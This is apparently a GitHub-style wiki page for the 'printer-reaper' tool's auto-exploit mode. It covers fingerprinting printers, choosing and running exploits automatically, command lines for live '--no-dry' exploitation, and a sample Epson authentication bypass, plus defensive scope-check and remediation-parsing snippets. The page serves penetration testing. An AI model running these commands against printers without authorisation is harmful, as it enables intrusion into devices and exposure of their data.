Auto Exploit

Andre Henrique edited this page Mar 25, 2026 · 1 revision

--auto-exploit automatically selects, verifies, and executes the best exploit for the detected target — no manual exploit selection required.


How It Works

1. Fingerprint     → grab_all() on target (banner, SNMP, HTTP, IPP)
2. Match           → match_exploits() against make/model/firmware/ports/CVEs
3. Sort            → by CVSS score descending
4. Verify (check)  → non-destructive probe on top N candidates
5. Pre-fill params → host, port, serial, mac, vendor auto-populated
6. Execute (run)   → top confirmed-vulnerable exploit(s), dry-run by default
7. Report          → summary table of all checked/executed exploits

The program determines which exploits apply — you do not choose.


Basic Usage

# Auto exploit (dry-run — safe, no destructive actions)
python printer-reaper.py 192.168.1.100 --auto-exploit

# With known serial number (pre-fills exploit parameters that require serial)
python printer-reaper.py 192.168.1.100 --auto-exploit --bf-serial XAABT77481

# With MAC address
python printer-reaper.py 192.168.1.100 --auto-exploit --bf-mac AA:BB:CC:DD:EE:FF

# Live exploitation — AUTHORIZED LABS ONLY
python printer-reaper.py 192.168.1.100 --auto-exploit --no-dry

# Restrict to a specific exploit source
python printer-reaper.py 192.168.1.100 --auto-exploit --xpl-source metasploit
python printer-reaper.py 192.168.1.100 --auto-exploit --xpl-source exploit-db
python printer-reaper.py 192.168.1.100 --auto-exploit --xpl-source research
python printer-reaper.py 192.168.1.100 --auto-exploit --xpl-source custom

All --auto-exploit Flags

| Flag | Default | Description |
|------|---------|-------------|
| --auto-exploit | | Enable automatic exploit pipeline |
| --auto-exploit-limit N | 8 | Max exploits to probe with check() |
| --auto-exploit-run N | 1 | Number of confirmed exploits to execute |
| --auto-exploit-file FILE | None | Path to a custom .py exploit file to force-use |
| --xpl-source SOURCE | all | Restrict to: metasploit, exploit-db, research, custom |
| --no-dry | dry-run | Execute live (removes dry-run protection) |
| --bf-serial SERIAL | | Serial number — auto-passed to exploits that need it |
| --bf-mac MAC | | MAC address — auto-passed to exploits that need it |
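
A launch-side guard for the --no-dry flag listed above, as an added example that is not part of printer-reaper: it vets an argument list before the tool is started and permits live mode only for targets inside approved lab ranges. The CIDR list, the live-run limit and the name vet_command are assumptions, and the target is assumed to be the first argument, as in the commands on this page.

```python
import ipaddress

# Assumption: ranges approved for live testing (constructed values).
AUTHORIZED_LAB_NETS = ["192.168.1.0/24"]
# Assumption: local policy ceiling for --auto-exploit-run on live runs.
MAX_LIVE_RUN = 1


def vet_command(argv, lab_nets=AUTHORIZED_LAB_NETS, max_live_run=MAX_LIVE_RUN):
    """Return (allowed, reason) for a printer-reaper argument list.

    argv is everything after 'printer-reaper.py', for example
    ['192.168.1.100', '--auto-exploit', '--no-dry'].
    """
    if "--no-dry" not in argv:
        return True, "dry-run: no live actions requested"
    if argv[0].startswith("--"):
        return False, "no target argument"
    try:
        target = ipaddress.ip_address(argv[0])
    except ValueError:
        # Hostnames can resolve anywhere, so live mode needs a literal IP.
        return False, f"target {argv[0]!r} is not a literal IP; cannot scope-check"
    nets = [ipaddress.ip_network(n) for n in lab_nets]
    if not any(target in n for n in nets):
        return False, f"{target} is outside the authorized lab ranges"
    run_n = 1  # default from the flags table
    if "--auto-exploit-run" in argv:
        idx = argv.index("--auto-exploit-run")
        try:
            run_n = int(argv[idx + 1])
        except (IndexError, ValueError):
            return False, "--auto-exploit-run needs an integer"
    if run_n > max_live_run:
        return False, f"--auto-exploit-run {run_n} exceeds live limit {max_live_run}"
    return True, f"live run permitted against {target}"
```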

Custom Exploit File

Force the auto pipeline to use a specific exploit file, with all parameters pre-filled automatically:

# Your own exploit.py — host/port/serial/vendor filled in automatically
python printer-reaper.py 192.168.1.100 --auto-exploit \
  --auto-exploit-file /path/to/my_exploit.py \
  --bf-serial XAABT77481

# The program calls:
#   check("192.168.1.100", port=80, timeout=10)  → True/False
#   run("192.168.1.100", port=80, serial="XAABT77481", dry_run=True)

Your exploit file must export check() and run() with the standard contract (see Exploit Library).


Parameter Pre-Filling

The engine automatically populates exploit run() parameters from:

| Exploit requires entry | Source |
|------------------------|--------|
| serial | --bf-serial or extracted from --scan |
| mac | --bf-mac |
| vendor | Detected from fingerprint (make field) |
| host | Target IP argument |
| port | Exploit metadata port field, or first open port |

Example Output

>> Auto Exploit — 192.168.1.100

  Fingerprint:
  Make     : Epson
  Model    : L3250 Series
  Firmware : 05.22.XF26P8
  Open ports: 80, 443, 631, 9100

  =================================================================
  AUTO EXPLOIT — 192.168.1.100
  Target  : Epson L3250 Series 05.22.XF26P8
  Matched : 4 exploit(s)
  Mode    : DRY-RUN
  =================================================================

  [check] HIGH     CVSS 7.5  research-epson-http-auth-bypass  Epson HTTP Auth Bypass
          [VULN]
  [check] MEDIUM   CVSS 6.5  research-canon-session-fixation  Canon/Epson Session Fixation
          [NOT VULN]
  [check] HIGH     CVSS 7.8  edb-35151  HP/Epson PJL Info Disclosure
          [VULN]
  [check] LOW      CVSS 5.3  research-ipp-anon-job  IPP Anonymous Job Submission
          [VULN]

  DRY-RUN Running research-epson-http-auth-bypass against 192.168.1.100:80

  [VULN] research-epson-http-auth-bypass
  Evidence:
    GET /PRESENTATION/HTML/TOP/PRTINFO.HTML → 200 OK
    admin panel accessible without authentication
    Firmware: 05.22.XF26P8
    Serial extracted: XAABT77481

  =================================================================
  AUTO EXPLOIT SUMMARY
  Checked    : 4 exploit(s)
  Vulnerable : 3
  Executed   : 1
  =================================================================
  EXPLOIT                        CVSS   VULN     RAN   STATUS
  -----------------------------------------------------------------
  research-epson-http-auth-bypass 7.5   YES      YES   [DRY-RUN] Would bypass auth
  edb-35151                       7.8   YES      no    -
  research-ipp-anon-job           5.3   YES      no    -
  research-canon-session-fixation 6.5   no       no    -
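
For feeding an assessment into a remediation backlog, the summary table above can be parsed as follows. This is an added example, not code from printer-reaper; it assumes the column layout shown in the sample output, and the function names are hypothetical. Every row marked VULN = YES is a confirmed finding whether or not it was executed.

```python
import re

# Summary rows copied from the example output on this page.
SAMPLE_SUMMARY = """\
  EXPLOIT                        CVSS   VULN     RAN   STATUS
  -----------------------------------------------------------------
  research-epson-http-auth-bypass 7.5   YES      YES   [DRY-RUN] Would bypass auth
  edb-35151                       7.8   YES      no    -
  research-ipp-anon-job           5.3   YES      no    -
  research-canon-session-fixation 6.5   no       no    -
"""

# One data row: id, CVSS score, VULN flag, RAN flag, free-text status.
ROW = re.compile(
    r"^\s*(?P<id>\S+)\s+(?P<cvss>\d+\.\d)\s+"
    r"(?P<vuln>YES|no)\s+(?P<ran>YES|no)\s+(?P<status>.*\S)\s*$"
)


def parse_summary(text):
    """Parse the AUTO EXPLOIT SUMMARY table into a list of dicts."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:  # header, rule and blank lines do not match
            continue
        rows.append({
            "id": m["id"],
            "cvss": float(m["cvss"]),
            "vulnerable": m["vuln"] == "YES",
            "executed": m["ran"] == "YES",
            "status": "" if m["status"] == "-" else m["status"],
        })
    return rows


def remediation_queue(rows):
    """Confirmed findings, highest CVSS first, for the fix backlog."""
    confirmed = [r for r in rows if r["vulnerable"]]
    return sorted(confirmed, key=lambda r: r["cvss"], reverse=True)
```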

Combining With Other Modes

# Full pipeline: scan → auto-exploit (most thorough)
python printer-reaper.py 192.168.1.100 --scan --auto-exploit

# Auto exploit after brute-force (serial known)
python printer-reaper.py 192.168.1.100 --bruteforce --bf-vendor epson --bf-serial XAABT77481
python printer-reaper.py 192.168.1.100 --auto-exploit --bf-serial XAABT77481

# Run multiple confirmed exploits
python printer-reaper.py 192.168.1.100 --auto-exploit --auto-exploit-run 3 --no-dry

# Check more candidates (wider net)
python printer-reaper.py 192.168.1.100 --auto-exploit --auto-exploit-limit 20

vs Manual Exploit Selection

| Feature | Manual (--xpl-check, --xpl-run) | Auto (--auto-exploit) |
|---------|---------------------------------|-----------------------|
| Exploit selection | User chooses ID | Program selects based on fingerprint |
| Parameter filling | User provides manually | Auto-filled from scan/flags |
| Vulnerability check | Optional (--xpl-check) | Always performed before run |
| Best for | Known target, specific CVE | Unknown target, quick assessment |
| Output | Single exploit result | Ranked list of all checked exploits |